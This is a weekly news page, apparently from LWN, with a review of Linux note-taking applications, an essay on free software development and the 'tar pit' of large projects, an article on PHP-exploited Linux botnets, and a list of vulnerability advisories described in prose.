Your editor is not always the most organized person. He is pretty sure he
still has a desk under the pile of papers, unpaid bills, and random
electronic components that surrounds his monitor - but he has not seen it
for some time. There are lots of sheets of paper full of handwritten notes
on that desk, but many of them have not seen the light of day for years.
There's probably some good stuff to be found in there, somewhere.
This is the information age, of course, and paper full of handwritten notes
is tremendously obsolete. Your editor's pen just doesn't have enough
fonts, and, besides, contemporary disk drives allow for the creation of
much higher piles of stuff. It's clearly time to go electronic.
There are numerous applications out there which are aimed at people trying
to create a digital note pile; your editor decided it was time to give a
few of them a try. As a way of narrowing the field somewhat, only
graphical applications were considered; command-line utilities, Emacs
modes, and so on were taken off the list. There's no shortage of web-based
wiki systems which can be employed in this role, but they are a topic for
another article some other time. Finally, there are a few systems which
are aimed at "mind mapping," which is a different objective entirely. Mind
mapping applications are on your editor's list to review, but, according to
his kids, your editor has lost his mind entirely and will thus have a hard
time mapping it.
Each application was looked at from a simple point of view: how well does
it support the tasks of quickly and easily creating, organizing, finding,
and using notes? There are, as we will see, a few approaches to this task.
xpad
There are a few applications which try to emulate the classic yellow pad of
sticky notes - but without the glue; xpad is one of those.
It maintains a series of little yellow windows, each of which can contain
simple text in a single font. The font and colors can be changed, but only
on a global basis. The first line of notes in each window becomes the
title for that window.
Like a number of note-taking applications, xpad puts an icon into the panel
task area. Simply clicking on that icon appears to do nothing - though
double-clicking causes all known notes to show up in the current
workspace. The right mouse button yields a menu with the titles of each
note window, along with "show all" and "close all" options. "Close all"
doesn't just close the windows, it causes the application to exit
completely.
There is an "edit lock" feature in xpad; it turns off editing on all
notes. There does not appear to be a way to lock a single window. There's
not a lot of other features available: no searching, no linking between
notes, no audio effects, etc. As a basic notepad, however, xpad seems good
enough.
xpostit
Xpostit may be the oldest of the applications reviewed by your editor. It
has no web page; it
would, in fact, appear to predate the web. It features those round Xaw
buttons which became briefly popular after X11R4 came out. Beyond that,
the interface is quite strange. Running xpostit pops up a single, small
(maybe 1.5cm square on your editor's display) window with a plaid,
presumably trademark-infringing design. Clicking on that window does
nothing until the right button is used, at which point the user is rewarded
with a menu allowing the creation of notes in several predefined sizes.
Note windows contain simple text in the ugliest monospace font the
developers could find. There is, beyond doubt, some X resource which can
be employed to change that font, but your editor, it must be said, has not
found messing around with X resources cool for some years now.
Xpostit is one of the few notes applications with a "save" button; most of
them save notes implicitly. There are no features of interest beyond the
provision of containers for bare text. There is no panel icon, and no way
to find a specific note beyond getting them all on-screen with "show all"
and starting to dig. In your editor's opinion, xpostit is an application
whose time has passed.
knotes
KNotes is a KDE-based notepad; like others, it is based on the little
yellow window concept. It has a more contemporary feel, however, and is
notably nicer to work with. The initial impression can be just a bit
off-putting, though, at least for those running KNotes outside of a KDE
desktop. KNotes puts up a shaped window without the usual window manager
decorations; instead, there is a yellow title bar with a red thumbtack in
it. The thumbtack does not appear to do anything other than function as a
cute example of the X11 shape extension. The title bar can be used to drag
the window around in the usual way, but employing the right button
does not yield the usual window manager menu; instead, most of the KNotes
functionality can be found there.
KNotes puts an icon in the task area; clicking on it gives a menu of note
titles. Selecting a title will move to the virtual desktop containing the
note (if any), a bit of a disorienting experience for users who are not
expecting it. Even worse, it remembers which desktop last contained a
note, and will put the note back in that desktop before moving.
The right mouse button gives a menu with a number of
options, including creating new notes, adjusting the ample (this is KDE,
after all) configuration options, and searching.
The search function is a valuable thing for a notes application to have;
once the number of notes gets large, it can get hard to remember where
something specific can be found. KNotes search is nice, in that it
searches through all notes and it supports regular expressions. There are
a couple of rough spots, though; if the next occurrence of the desired text
is in a window found on a different virtual desktop, it moves the desktop
rather than the window. Then it helpfully puts up a little "search for the
next occurrence?" dialog - directly on top of the window containing the
text the user was looking for.
There are a few features unique to KNotes. One of those is alarms, added
presumably so that the user can use notes as a simple appointment manager.
There is an option to send notes via email. It is also possible to send
notes directly to an instance of KNotes running on another system - though
the acceptance of notes over the network is (sensibly) turned off by
default. Notes can be locked on a per-note basis, preventing inadvertent
modification of notes when desired.
Another nice feature is that notes can be dismissed by hitting the escape
key. As a result, pulling up a note, adding a line, and making it go away
can be a very quick operation - and that, in turn, encourages the keeping
of good and complete notes. Without the desktop warping, KNotes would be
almost perfect as a simple, quick, capable, and visually attractive notes
manager.
It's worth noting (so to speak) that KNotes is also available as a
component of the Kontact organizer.
Running Kontact gives access to all of the notes created in KNotes, but it
appears that the full integration of this functionality is a work in
progress. Kontact notes windows look more like traditional text editing
windows; they do not appear to be intended to be left around the screen
like KNotes windows. Kontact does add a spelling checker, however. Even
so, in your editor's opinion, KNotes works better as a standalone
application at this time.
Tomboy
Tomboy is a GNOME and
Mono-based note-taking application which attempts to provide both
simplicity and useful features. Your editor has been using it for some
months now.
Tomboy places an icon on the panel - not in the task area. Clicking on
that icon yields a menu with the titles of the ten most recently modified
notes, along with create and search options. Unfortunately, your editor
seems to cycle through a set of about eleven notes, with the result that
the desired one is often not on the list. Selecting "search all notes"
brings up a dialog with all known notes and a simple search box. Typing
text into that box trims the list of notes to those containing matches.
There is no regular expression capability.
The escape key will dismiss a Tomboy window; combined with the panel icon,
this feature allows for quick note updates.
A feature unique to Tomboy - at least, among the applications reviewed here
- is the ability to link between notes. By highlighting a term, the user
can create a new note using that term as its title; thereafter, clicking on
the term will bring up the new note. There is also a backlink feature: the
tools menu includes a "what links here?" item which will give a list of
notes linking to the current one.
Tomboy has a fair number of options for decorating text with different
fonts, colors, sizes, etc. For the most part, there is not much use for
this capability in a note-taking application, but the ability to create
bold headers can be nice. It's also useful to be able to strike out text
to, for example, mark off completed items on a "to do" list. A long list
of crossed-out items just gives more satisfaction than simply deleting
them, somehow. Tomboy will also create bulleted lists when lines are typed
beginning with an asterisk.
Notes can be printed (a feature not supported by all applications) or
exported to HTML. There is a plugin mechanism which can be used to add
interesting functionality; current plugins offer integration with evolution
and bugzilla, for example. Tomboy also has a spelling checker which, by
default, decorates notes with lots of obnoxious red underlines. It is rare
that perfect spelling is required in a collection of personal notes,
however, so your editor is pleased that this feature can be turned off.
Overall, Tomboy is a nice application; your editor's biggest complaint
would be that its memory footprint is huge - even by GNOME standards. The
use of Mono cannot help in this regard; it is hard to imagine which
features in an application like this would really need the Mono framework
for their implementation. With a bit less baggage, Tomboy would be nearly
perfect.
BasKet
Finally, your editor played with BasKet, a KDE application which
celebrated its 1.0 release on February 12.
Unlike other note-taking applications, BasKet does all of its work within a
single window. At the top level, it maintains a tree of "baskets," each of
which can contain any number of notes. Only one "basket" can be viewed at
any given time. Baskets can be configured with up to three columns; notes
are then lined up in the columns. There is also a free-format mode, where
notes can be placed anywhere, even on top of each other. In your editor's
opinion, the proper metaphor might be a bulletin board - each "basket" is a
place where any number of things can be pinned and organized.
BasKet offers a great deal of control over fonts, sizes, weights, and so on.
There is a mechanism for attaching tags to notes; each tag brings with
it an icon and, perhaps, a set of heavy-handed color choices. Tagging an
item as "work," for example, turns the text a sort of dark yellow color.
There is an "insert image" operation which yields an empty note and a
dialog on how BasKet cannot do image editing. Dragging an image over from
konqueror does the expected thing - though your editor remains a little
mystified by the concept of "moving" (as opposed to "copying") an image
into the application. Baskets can also contain links, application
launchers, and other surprises.
The end result of all this stuff is that the BasKet window quickly turns
into a gaudy mess of wild colors and images. If your editor's word is not
sufficient on this fact, the BasKet screenshots page
should dispel any doubt. The BasKet developers are also enamored of
animated effects, tooltips, and the use of audio signals.
The display of any given basket can be narrowed to items marked with a
given tag. There is also a simple search mechanism which shows only the
notes containing a given string. No regular expressions are supported, and
the search only applies to the currently-displayed basket by default -
though there is an option to make it global.
There is a feature by which baskets can be globally bound to shortcut keys,
allowing them to be summoned by a single keystroke. Unfortunately, an
attempt to play
with that feature left your editor with a totally locked keyboard, a
situation which made the writing of this article rather more difficult than
it otherwise had to be. Logging in over the net and killing BasKet took
care of the problem. One assumes this behavior is not part of the original
design specification.
Summary
Of the applications reviewed, the first two (xpad and xpostit) are of
relatively little interest. They reflect the state of the desktop art as
it was several years in the past. Xpad is still a useful application, but
it has been surpassed by others.
BasKet is an interesting attempt to do new things with notes. For your
editor's needs, however, it is overkill. The whole point of note taking is
to collect ideas together, track things to do, etc. It doesn't need
images, colors, animations, sounds, and so on. BasKet seems to be more
directly aimed at people who care about making their notes collections look
cool. Your editor, who gave up any hope of looking cool back in high
school, does not need BasKet's features.
That leaves KNotes and Tomboy. Either is an entirely capable application.
The Tomboy feature set still seems like it is most directly focused on the
note-taking application; the search feature is nicer to use and linking
between notes is useful. But one could get the job done quite nicely with
either of these applications.
Comments (47 posted)
This
Washington Post article is one of many expressing disappointment with
Microsoft's Vista release, which is famously late and which has failed to
live up to Microsoft's early promises. The article claims that the
problems are not specific to Microsoft:
The sad truth is that Microsoft's woes aren't unusual in this
industry. Large-scale software projects are perennially beset by
dashed hopes and bedeviling delays. They are as much a tar pit
today as they were 30 years ago, when a former IBM program manager
named Frederick P. Brooks Jr. applied that image to them in his
classic diagnosis of the programming field's troubles, "The
Mythical Man-Month."
In this context, it behooves us to ask: is there a free software tar pit in
our future? What can we do to avoid a grim future where we bog down, our
software collapsing under its own weight?
Looking at the state of the free software community now, it is tempting to
say that, so far, we have nicely avoided the tar pit. But have we? Here
are a few dates from the past which may be of interest:
- The 2.2.0 kernel was released on January 26, 1999.
- 2.4.0 came out on January 4, 2001.
- 2.5.1 - the beginning of the next development series - was released on
December 16, 2001
The 2.5 development series was stalled for almost one full year while 2.4
reached a state which actually approached stable. Overall, the process
from 2.2.0 to a stable 2.4 took almost three years; the kernel was in a
"feature freeze" state for about two of those years. This was a time when
quite a few people - many of them kernel developers - felt let down by the
development process. This, your editor would attest, was a tar pit era.
One might well argue that the kernel has not yet escaped that tar pit. Like
Vista, we lack a shiny new next-generation filesystem; the only credible
attempt at such a filesystem (reiser4) remains in a stalled,
feature-reduced state. It seems likely, however, that most observers would
agree that the tar pit has been left far behind. The kernel development
process has been humming along at a high pace, delivering interesting new
releases every few months. The same story can be seen in many other parts
of the free software community.
If we accept that things have gotten better, it can be interesting to look
at why. One hint can be found in the same article:
Without that discipline, too often, software teams get lost in what
are known in the field as "boil-the-ocean" projects -- vast schemes
to improve everything at once. That can be inspiring, but in the
end we might prefer that they hunker down and make incremental
improvements to rescue us from bugs and viruses and make our
computers easier to use. Idealistic software developers love to
dream about world-changing innovations; meanwhile, we wait and wait
for all the potholes to be fixed.
Any successful free software project must get good at fixing potholes; in
the worst case, users (and distributors) will do the job for themselves.
In a well-managed project, the people who are trying to improve the whole
world will not get in the way of the pothole fixers. There is no single
team, charged with all the development on a project, which can get bogged
down in that way.
A "well-managed project" must find a way to keep whole-world improvements
from stopping everything else, however. The older, multi-year kernel
process did not always succeed on that front; the attempt to improve the
entire kernel ended up bogging down the entire process. The new kernel
development model,
with its short release cycles, has caused some developers to complain that
it is no longer possible to make major changes that require a long time to
settle down. To the extent that this complaint is true, it should maybe be
seen as a good thing. By only merging changes which can be brought to a
releasable state within a month or two, the new process sidesteps the
tar pit and keeps the development machine running.
One of the key suggestions in The Mythical Man Month is the
formation of "surgical teams" to support the lead programmer(s). Some of
the team members - such as the clerk who "keys in" the code - seem a little
quaint now. But the idea that the people running the project (or parts of
it) need lieutenants, documentation writers, tool makers, etc. still makes
a lot of sense. Once upon a time, the kernel lacked much of that
structure, with everything concentrating on a single developer - Linus
Torvalds. Now there is a vast network of lieutenants. Quite a few
developers focus their effort not on the kernel, but on the tools used by
kernel developers. All that's missing are the clerks - and, perhaps,
the documentation writers.
One of the biggest anti-tar pit technologies used by the free software
community would have been hard for Mr. Brooks to imagine back in 1972:
multiple, independent development teams. Any project of any size has a
wide range of independent, sometimes conflicting development efforts
happening at the same time. If one group bogs down, the others continue
unhindered. The process may seem inefficient, given that a significant
portion of the work which is done may never survive to a stable release.
Throwing away code can be painful, but it is far less so than throwing away
the entire project.
Peer review is also missing from the Brooks landscape. But peer review
helps to ensure one of the things he thought was vital for a successful
project: a clear conceptual architecture for the project. That
architecture may take a surprising form: few free software projects have the
sort of extensive design documentation that he probably had in mind. But a
crowd of reviewers can help to ensure that new code is consistent with the
principles behind a project - and that it is maintainable into the future.
In this context, it is notable (and worrisome) that an increasing number of
proposed kernel features are finding themselves stalled by a lack of
reviews.
Finally, one should note that free software projects have mostly learned a
sure-fire way to avoid a failure to live up to their promises: they don't
make any. Vaporware tends to be scarce in this community; either the code
exists or it does not. Very few projects are truly controlled by one
corporation, so companies are also restrained in the promises they make
about future releases; they are in no position to ensure that those
promises are fulfilled. The relative freedom from marketing-driven
promises helps free software projects avoid disappointments - but it also
helps them to focus effort on objectives with a reasonable chance of
success.
To argue that the free software community is immune to the problems of
large-scale software development would be foolish. For all their growth,
many or most components of a system like Linux are still a fraction of the
size of their equivalents on certain proprietary systems. As our code base
grows, there will undoubtedly be new challenges for those who would
continue to develop it. But the free systems we have today must certainly
far exceed the size of System/360 when Mr. Brooks was managing it, and we
would appear to be going strong. With widespread community participation,
improving tools, and the willingness to change our development models in
response to real-world problems, we should be about to stay out of that
tar pit for some time yet.
Comments (57 posted)
Page editor: Jonathan Corbet
Security
February 14, 2007
This article was contributed by Jake Edge.
Collections of subverted machines, called
botnets are typically
associated with Windows; thousands of zombie desktops sending spam and
causing other internet mayhem. Unfortunately, it is increasingly clear
that Linux boxes (as well as MacOS X and other UNIX boxes) are
participating in botnets, but in a bit of a twist, it is mostly servers
that have been subverted. Botnets are an enormous problem that
Vint Cerf recently
estimated
may involve up to one quarter of all internet connected computers. This
translates to a botnet controller's fondest wish: 150 million zombie machines
to rent to the highest bidder.
Desktops are usually infected with a bot by an email-borne virus or a
trojan attached to some application that the user installs, much like
adware and spyware infect machines. The bot software then connects to a
'command and control' (C&C) infrastructure, that often use Internet Relay
Chat (IRC) servers, to get instructions on what they should do. The 'owner'
of a botnet (known as a bot herder) can then instruct the bots to do whatever
they, or more likely their client, want. Because the traffic
generated from a botnet comes from all over the Internet, it is difficult
or impossible to recognize it for what it is. This allows botnets to be
used for spamming, distributed denial of service (DDOS) attacks, click fraud and
other malicious activities in a largely untraceable way.
The desktop infection methods are not typically as useful for Linux boxes
and so bot herders have turned to web application exploits as a means
for collecting subverted machines. Attacking servers has the additional
advantage that they are usually machines with much greater resources:
faster network connectivity, more storage, faster processors, etc. The attacks
are largely targeted at everyone's favorite Internet security whipping
boy, PHP applications. Open source PHP applications are the
main target as they are ubiquitous and typically easy to exploit as
some recent
research
indicates. An additional benefit of targeting a higher level application
is that it is a cross-platform exploit; the operating system and web server
software are immaterial if the target is a PHP application.
The easiest type of vulnerability to exploit is often
Remote File
Inclusion (RFI) which allows an attacker to run code on a
vulnerable server with the permissions of the webserver. Generally,
those permissions are sufficient to allow the bot to do anything the herder
might wish it to; sending email and other network traffic is not normally a privileged
activity. Even a cursory glance at the Bugtraq mailing list will reveal
numerous RFI vulnerabilities; they are reported regularly and each can lead
to bot exploitation if not patched.
Many different types of malware can be installed on a vulnerable machine,
depending on the intent of the herder. As with the exploit itself, the
installed code tends to be written in a scripting language so that it is
cross-platform. The malware can range from simple test tools
that indicate vulnerable servers to sophisticated shells that allow the
attacker to effectively login to the server and perform any allowed operation.
The most serious damage that these botnets have caused is to our
inbox; bots seem to be the preferred way to deliver spam these days.
Diligent anti-spam efforts tend to get spamming accounts or systems shut
down within hours but there is no easy way to shut down a spam-delivering botnet. A less
visible, but potentially more damaging effect is DDOS
attacks
on internet sites. By attacking a site and working their way up the
chain of DNS servers and registrars, a botnet can silence a site the herder
does not like or hold sites hostage until they pay a ransom.
Past efforts to thwart botnets have often focused on destroying the C&C
servers by shutting down the affected IRC sites, but botnets are
moving toward using HTTP for C&C which allows that traffic to hide amongst
the sea of similar traffic; it also has the advantage of getting through
most firewalls. Botnets will be a serious problem going forward, and Linux
systems are not immune to participation in them. The
financial incentive is large and the means of prevention are weak, at least
so far. As we have learned by trying to deal with spam, money makes our
adversaries much more inventive which makes long-term solutions hard to
come by.
Comments (31 posted)
Brief items
For those who are interested in the Solaris telnet vulnerability, Gadi
Evron has put together a comprehensive summary of the problem, how Sun
responded, where to get fixes, etc. "
Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without
too many PR/legal blocks getting in their way are very encouraging..."
Full Story (comments: 5)
New vulnerabilities
ImageMagick: buffer overflow
| Package(s): | imagemagick |
CVE #(s): | CVE-2007-0770
|
| Created: | February 12, 2007 |
Updated: | February 16, 2007 |
| Description: |
Vladimir Nadvornik discovered a buffer overflow in GraphicsMagick and
ImageMagick allows user-assisted attackers to cause a denial of service and
possibly execute execute arbitrary code via a PALM image that is not
properly handled by the ReadPALMImage function in coders/palm.c. |
| Alerts: |
|
Comments (1 posted)
MoinMoin: cross-site scripting
| Package(s): | moinmoin |
CVE #(s): | CVE-2007-0857
|
| Created: | February 12, 2007 |
Updated: | February 14, 2007 |
| Description: |
Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin before
1.5.7 allow remote attackers to inject arbitrary web script or HTML via (1)
the page info, or the page name in a (2) AttachFile, (3) RenamePage, or (4)
LocalSiteMap action. |
| Alerts: |
|
Comments (none posted)
rar: buffer overflow
| Package(s): | rar |
CVE #(s): | CVE-2007-0855
|
| Created: | February 14, 2007 |
Updated: | February 14, 2007 |
| Description: |
The rar archive utility contains a buffer overflow in its processing of password-protected archives. Version 3.7.3 contains the fix. |
| Alerts: |
|
Comments (none posted)
smb4k: multiple vulnerabilities
| Package(s): | smb4k |
CVE #(s): | CVE-2007-0472
CVE-2007-0473
CVE-2007-0474
CVE-2007-0475
|
| Created: | February 13, 2007 |
Updated: | March 12, 2007 |
| Description: |
The Smb4K
0.8.0 release announcement notes that several security weaknesses in
the utility programs (stack overflows / the use of strcpy instead of
strncpy / a design error in smb4k_kill) and in the Smb4KFileIO class (use
of mktemp instead of mkstemp for creation of the temporary files which
could lead to both a race and an information leak / a race in the code that
handles the lock file). Fixes for all of these issues are included in Smb4K
0.8.0 and in the patches that have been prepared for Smb4K 0.7.5 and
0.6.10a. Other versions are not supported anymore. |
| Alerts: |
|
Comments (none posted)
snort: denial of service
| Package(s): | snort |
CVE #(s): | CVE-2006-6931
|
| Created: | February 14, 2007 |
Updated: | March 1, 2007 |
| Description: |
From the Gentoo advisory: Randy Smith, Christian Estan and Somesh Jha discovered that the rule
matching algorithm of Snort can be exploited in a way known as a
"backtracking attack" to perform numerous time-consuming operations. Version 2.6.1.2 contains the fix. |
| Alerts: |
|
Comments (none posted)
twiki: arbitrary code execution
| Package(s): | twiki |
CVE #(s): | CVE-2007-0669
|
| Created: | February 12, 2007 |
Updated: | February 14, 2007 |
| Description: |
According to this
vendor security advisory, a vulnerability exists in the SessionPlugin
extension of the Wiki engine TWiki, version up to and including 4.1.0. The
vulnerability allows local users to cause TWiki to execute arbitrary Perl
code with the privileges of the web server process by creating CGI session
files on the local filesystem. |
| Alerts: |
|
Comments (none posted)
wordpress: multiple vulnerabilities
| Package(s): | wordpress |
CVE #(s): | CVE-2007-0262
CVE-2007-0539
CVE-2007-0541
|
| Created: | February 13, 2007 |
Updated: | February 14, 2007 |
| Description: |
Wordpress does not properly verify that the m parameter value has the
string data type, which allows remote attackers to obtain sensitive
information via an invalid m[] parameter, as demonstrated by obtaining the
path, and obtaining certain SQL information such as the table
prefix. (CVE-2007-0262)
WordPress before 2.1 allows remote attackers to cause a denial of service
(bandwidth or thread consumption) via pingback service calls with a source
URI that corresponds to a large file, which triggers a long download
session without a timeout constraint. (CVE-2007-0539)
WordPress allows remote attackers to determine the existence of arbitrary
files, and possibly read portions of certain files, via pingback service
calls with a source URI that corresponds to a local pathname, which
triggers different fault codes for existing and non-existing files, and in
certain configurations causes a brief file excerpt to be published as a
blog comment. (CVE-2007-0541) |
| Alerts: |
|
Comments (none posted)
Updated vulnerabilities
acroread: multiple vulnerabilities
| Package(s): | acroread |
CVE #(s): | CVE-2006-5857
CVE-2007-0045
CVE-2007-0046
|
| Created: | January 11, 2007 |
Updated: | October 26, 2009 |
| Description: |
Adobes acrobat reader has the following vulnerabilities:
The Adobe Reader Plugin has a cross site scripting vulnerability that
can be triggered by processes malformed URLs. Arbitrary JavaScript can
be served by a malicious web server, leading to a cross-site scripting
attack.
Maliciously crafted PDF files can be used to trigger two vulnerabilities,
if an attacker can trick a user into viewing the files, arbitrary code
can be executed with the user's privileges. |
| Alerts: |
|
Comments (1 posted)
apache: cross-site scripting
| Package(s): | apache |
CVE #(s): | CVE-2006-3918
|
| Created: | August 9, 2006 |
Updated: | April 4, 2008 |
| Description: |
From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server
was returned to the user in an unescaped error message. This could
allow an attacker to perform a cross-site scripting attack if a victim was
tricked into connecting to a site and sending a carefully crafted Expect
header." |
| Alerts: |
|
Comments (none posted)
bcfg2: local password disclosure
| Package(s): | bcfg2 |
CVE #(s): | |
| Created: | February 1, 2007 |
Updated: | February 7, 2007 |
| Description: |
The bcfg2 configuration file has incorrect permissions, this can
be used for a local password disclosure to unprivileged users. |
| Alerts: |
|
Comments (none posted)
bind: denial of service
| Package(s): | bind |
CVE #(s): | CVE-2007-0493
CVE-2007-0494
|
| Created: | January 26, 2007 |
Updated: | March 14, 2007 |
| Description: |
The bind package is vulnerable to two remote denial of service attacks in
which attackers can cause the bind daemon to to crash or exit unexpectedly
by providing malformed data to the daemon in a DNS request. |
| Alerts: |
|
Comments (none posted)
bluez-utils: hidd vulnerability
| Package(s): | bluez-utils |
CVE #(s): | CVE-2006-6899
|
| Created: | January 16, 2007 |
Updated: | May 14, 2007 |
| Description: |
hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain
control of the Mouse and Keyboard Human Interface Device (HID) via a
certain configuration of two HID (PSM) endpoints, operating as a server,
aka HidAttack. |
| Alerts: |
|
Comments (none posted)
bugzilla: multiple vulnerabilities
| Package(s): | bugzilla |
CVE #(s): | CVE-2006-5453
CVE-2006-5454
CVE-2006-5455
|
| Created: | November 10, 2006 |
Updated: | August 28, 2007 |
| Description: |
Bugzilla has the following vulnerabilities:
Input data passed to various fields is not properly sanitized before
being passed back to users.
Users can gain unauthorized access to read attachment
descriptions while using diff mode.
HTTP GET and HTTP POST requests can be used to perform unauthorized
actions due to improper verification.
Input that is passed to showdependencygraph.cgi is not properly
sanitized before being returned to users. |
| Alerts: |
|
Comments (none posted)
busybox: insecure password generation
| Package(s): | busybox |
CVE #(s): | CVE-2006-1058
|
| Created: | May 5, 2006 |
Updated: | May 2, 2007 |
| Description: |
The BusyBox 1.1.1 passwd command does not use a proper salt when generating
passwords. This would create an instance where a brute force attack could
take very little time. |
| Alerts: |
|
Comments (2 posted)
cpio: arbitrary code execution
| Package(s): | cpio |
CVE #(s): | CVE-2005-4268
|
| Created: | January 2, 2006 |
Updated: | March 17, 2010 |
| Description: |
Richard Harms discovered that cpio did not sufficiently validate file
properties when creating archives. Files with e. g. a very large size
caused a buffer overflow. By tricking a user or an automatic backup
system into putting a specially crafted file into a cpio archive, a
local attacker could probably exploit this to execute arbitrary code
with the privileges of the target user (which is likely root in an
automatic backup system). |
| Alerts: |
|
Comments (none posted)
vixie-cron: privilege escalation
| Package(s): | cron |
CVE #(s): | CVE-2006-2607
|
| Created: | May 31, 2006 |
Updated: | June 1, 2009 |
| Description: |
The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root. |
| Alerts: |
|
Comments (1 posted)
cscope: buffer overflows
| Package(s): | cscope |
CVE #(s): | CVE-2006-4262
|
| Created: | October 2, 2006 |
Updated: | June 16, 2009 |
| Description: |
Will Drewry of the Google Security Team discovered several buffer overflows
in cscope, a source browsing tool, which might lead to the execution of
arbitrary code. |
| Alerts: |
|
Comments (none posted)
cscope: buffer overflows
| Package(s): | cscope |
CVE #(s): | CVE-2004-2541
|
| Created: | May 22, 2006 |
Updated: | June 19, 2009 |
| Description: |
A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows
remote attackers to execute arbitrary code via a C file with a long
#include line that is later browsed by the target. |
| Alerts: |
|
Comments (1 posted)
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
| Package(s): | cyrus-sasl |
CVE #(s): | CVE-2006-1721
|
| Created: | April 21, 2006 |
Updated: | September 4, 2007 |
| Description: |
Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5
process that could lead to a Denial of Service. An attacker could possibly
exploit this vulnerability by sending specially crafted data stream to the
Cyrus-SASL server, resulting in a Denial of Service even if the attacker is
not able to authenticate. |
| Alerts: |
|
Comments (none posted)
dbus: denial of service
| Package(s): | dbus |
CVE #(s): | CVE-2006-6107
|
| Created: | December 15, 2006 |
Updated: | February 12, 2007 |
| Description: |
Unspecified vulnerability in the match_rule_equal function in bus/signals.c
in D-Bus before 1.0.2 allows local applications to remove match rules for
other applications and cause a denial of service (lost process messages). |
| Alerts: |
|
Comments (none posted)
dovecot: index cache file handling error
| Package(s): | dovecot |
CVE #(s): | CVE-2006-5973
|
| Created: | November 29, 2006 |
Updated: | May 8, 2007 |
| Description: |
The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable. |
| Alerts: |
|
Comments (none posted)
elinks: arbitrary file access
| Package(s): | elinks |
CVE #(s): | CVE-2006-5925
|
| Created: | November 16, 2006 |
Updated: | October 22, 2009 |
| Description: |
The elinks text-mode browser has an arbitrary file access vulnerability
in the Elinks SMB protocol handler. If a user can be tricked into
visiting a specially crafted web page, arbitrary files may be read or
written with the user's permissions. |
| Alerts: |
|
Comments (none posted)
fetchmail: password disclosure and DOS
| Package(s): | fetchmail |
CVE #(s): | CVE-2006-5867
CVE-2006-5974
|
| Created: | January 10, 2007 |
Updated: | March 16, 2007 |
| Description: |
Fetchmail suffers from a password disclosure vulnerability due to a failure to use secure protocols (advisory) and a denial of service vulnerability (advisory). |
| Alerts: |
|
Comments (none posted)
ffmpeg: buffer overflows
| Package(s): | ffmpeg |
CVE #(s): | CVE-2006-4799
CVE-2006-4800
|
| Created: | September 14, 2006 |
Updated: | May 28, 2007 |
| Description: |
the AVI processing code in FFmpeg has a number of buffer overflow
vulnerabilities.
If an attacker can trick a user into loading a specially crafted
crafted AVI, arbitrary code can be executed with the user's privileges. |
| Alerts: |
|
Comments (2 posted)
Mozilla stuff: multiple vulnerabilities
Comments (none posted)
freeradius: several vulnerabilities
| Package(s): | freeradius |
CVE #(s): | CVE-2005-4745
CVE-2005-4746
|
| Created: | August 8, 2006 |
Updated: | April 24, 2007 |
| Description: |
Several remote vulnerabilities have been discovered in freeradius, a
high-performance RADIUS server, which may lead to SQL injection or denial
of service. |
| Alerts: |
|
Comments (none posted)
freetype: integer overflows
| Package(s): | freetype |
CVE #(s): | CVE-2006-0747
CVE-2006-1861
CVE-2006-2493
CVE-2006-2661
CVE-2006-3467
|
| Created: | June 8, 2006 |
Updated: | June 1, 2010 |
| Description: |
The FreeType library has several integer overflow vulnerabilities.
If a user can be tricked into installing a specially
crafted font file, arbitrary code can be executed with the privilege
of the user. |
| Alerts: |
|
Comments (none posted)
ftpd: privilege escalation
| Package(s): | ftpd |
CVE #(s): | CVE-2006-5778
|
| Created: | November 10, 2006 |
Updated: | February 14, 2007 |
| Description: |
Ftpd is vulnerable to a privilege escalation attack,
an incorrect seteuid() call can be used by an FTP user to gain
unauthorized access to files or directories. |
| Alerts: |
|
Comments (none posted)
gcc: file overwrite vulnerability
| Package(s): | gcc |
CVE #(s): | CVE-2006-3619
|
| Created: | September 6, 2006 |
Updated: | March 14, 2008 |
| Description: |
The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree. |
| Alerts: |
|
Comments (none posted)
gd: buffer overflow
| Package(s): | gd |
CVE #(s): | CVE-2007-0455
|
| Created: | February 7, 2007 |
Updated: | November 18, 2009 |
| Description: |
The gd graphics library contains a buffer overflow which could enable a remote attacker to execute arbitrary code. Note that various other packages include code from gd and could also be vulnerable. |
| Alerts: |
|
Comments (2 posted)
gdb: buffer overflow
| Package(s): | gdb |
CVE #(s): | CVE-2006-4146
|
| Created: | September 15, 2006 |
Updated: | June 12, 2007 |
| Description: |
A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU
Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to
execute arbitrary code via a crafted file with a location block
(DW_FORM_block) that contains a large number of operations. |
| Alerts: |
|
Comments (none posted)
gdm: improper file permissions
| Package(s): | gdm |
CVE #(s): | CVE-2006-1057
|
| Created: | April 19, 2006 |
Updated: | May 2, 2007 |
| Description: |
The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem. |
| Alerts: |
|
Comments (none posted)
gedit: format string vulnerability
| Package(s): | gedit |
CVE #(s): | CAN-2005-1686
|
| Created: | June 9, 2005 |
Updated: | February 5, 2009 |
| Description: |
A format string vulnerability has been discovered in gedit. Calling
the program with specially crafted file names caused a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the gedit user. |
| Alerts: |
|
Comments (1 posted)
gnupg: stack overwrite
| Package(s): | gnupg |
CVE #(s): | CVE-2006-6235
|
| Created: | December 12, 2006 |
Updated: | March 13, 2007 |
| Description: |
A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to
execute arbitrary code via crafted OpenPGP packets that cause GnuPG to
dereference a function pointer from deallocated stack memory. |
| Alerts: |
|
Comments (3 posted)
grip: buffer overflow
| Package(s): | grip |
CVE #(s): | CAN-2005-0706
|
| Created: | March 10, 2005 |
Updated: | November 19, 2008 |
| Description: |
Grip, a CD ripper, has a buffer overflow vulnerability that can
occur when the CDDB server returns more than 16 matches. |
| Alerts: |
|
